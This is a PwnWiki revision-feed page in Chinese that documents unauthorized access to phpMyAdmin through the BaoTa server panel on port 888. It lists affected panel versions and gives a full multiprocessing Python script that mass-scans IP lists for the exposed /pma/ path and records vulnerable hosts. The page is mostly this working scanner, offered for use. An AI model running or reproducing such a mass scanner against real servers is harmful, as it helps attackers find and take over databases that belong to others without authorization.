https://pwnwiki.com/index.php?action=history&feed=atom&title=%E5%AF%B6%E5%A1%94%E9%9D%A2%E6%9D%BF%E6%9C%AA%E6%8E%88%E6%AC%8A%E8%A8%AA%E5%95%8FphpMyAdmin%E6%BC%8F%E6%B4%9E%2Fzh-hant
寶塔面板未授權訪問phpMyAdmin漏洞/zh-hant - Revision history
2026-04-07T20:12:57Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=%E5%AF%B6%E5%A1%94%E9%9D%A2%E6%9D%BF%E6%9C%AA%E6%8E%88%E6%AC%8A%E8%A8%AA%E5%95%8FphpMyAdmin%E6%BC%8F%E6%B4%9E/zh-hant&diff=6955&oldid=prev
Pwnwiki: Created page with "寶塔面板未授權訪問phpMyAdmin漏洞"
2021-07-10T08:03:45Z
<p>Created page with "寶塔面板未授權訪問phpMyAdmin漏洞"</p>
<p><b>New page</b></p><div><languages /><br />
<br />
==漏洞影響==<br />
<br />
<pre><br />
Liunx 7.4.2/windows 6.8<br />
</pre><br />
<br />
==批量掃描==<br />
<pre><br />
#!/usr/bin/env python<br />
<br />
# -*- coding:utf-8 -*-<br />
<br />
<br />
<br />
"""<br />
<br />
Author www.ti0s.com<br />
<br />
"""<br />
<br />
<br />
<br />
import sys<br />
<br />
import argparse<br />
<br />
import requests<br />
<br />
from multiprocessing import Pool, Manager<br />
<br />
<br />
<br />
print("""<br />
<br />
_____ _ ____ ______ ____ ____ __ __<br />
<br />
|_ _|(_) / \ / ___/ / ___\ / \ | \ / |<br />
<br />
| | _ | / \ | \___ \ | / | / \ || \/ |<br />
<br />
| | | || \__/ | /___ > _ | \___ | \__/ || |\ /| |<br />
<br />
|_| |_| \____/ \/ (_) \____/ \____/ |_| \/ | |(C)<br />
<br />
""")<br />
<br />
headers = {<br />
<br />
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36",<br />
<br />
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",<br />
<br />
}<br />
<br />
<br />
<br />
def btPam(ip):<br />
<br />
url = "http://%s:888/pma/" % (ip)<br />
<br />
try:<br />
<br />
res = requests.get(url,headers=headers,timeout=5)<br />
<br />
if res.status_code == 200:<br />
<br />
print("%s Potentially Vulnerable"%(ip))<br />
<br />
with open("result.txt","w") as wf:<br />
<br />
wf.write(url)<br />
<br />
finally:<br />
<br />
return<br />
<br />
<br />
<br />
def isbt(ip, q):<br />
<br />
print('Testing {}'.format(ip))<br />
<br />
btPam(ip)<br />
<br />
q.put(ip)<br />
<br />
<br />
<br />
def readip(flie):<br />
<br />
ips = []<br />
<br />
with open(flie,"r") as rf:<br />
<br />
for i in rf.readlines():<br />
<br />
ip = i.lstrip('https://').lstrip('http://').rstrip(':888').rstrip("/").strip()<br />
<br />
ips.append(ip)<br />
<br />
return ips<br />
<br />
<br />
<br />
def pool(ips):<br />
<br />
p = Pool(10)<br />
<br />
q = Manager().Queue()<br />
<br />
for i in ips:<br />
<br />
p.apply_async(isbt, args=(i,q,))<br />
<br />
p.close()<br />
<br />
p.join()<br />
<br />
print('请查看当前路径下文件:result.txt')<br />
<br />
<br />
<br />
def run(filepath):<br />
<br />
ips=readip(filepath)<br />
<br />
pool(ips)<br />
<br />
<br />
<br />
def main():<br />
<br />
parser = argparse.ArgumentParser()<br />
<br />
parser.add_argument('-l','--file',dest='file',type=str,help='批量扫描IP地址,示例:-l ip.txt ')<br />
<br />
parser.add_argument('-i','--ip',dest='ip',type=str,help='单独扫描IP地址,示例:-i 192.168.0.1')<br />
<br />
pa = parser.parse_args()<br />
<br />
if len(sys.argv[1:]) == 0:<br />
<br />
print("输入 -h 参数查看使用说明")<br />
<br />
exit()<br />
<br />
if pa.ip:<br />
<br />
btPam(pa.ip)<br />
<br />
if pa.file:<br />
<br />
run(pa.file)<br />
<br />
<br />
<br />
if __name__ == '__main__':<br />
<br />
main() <br />
</pre></div>
Pwnwiki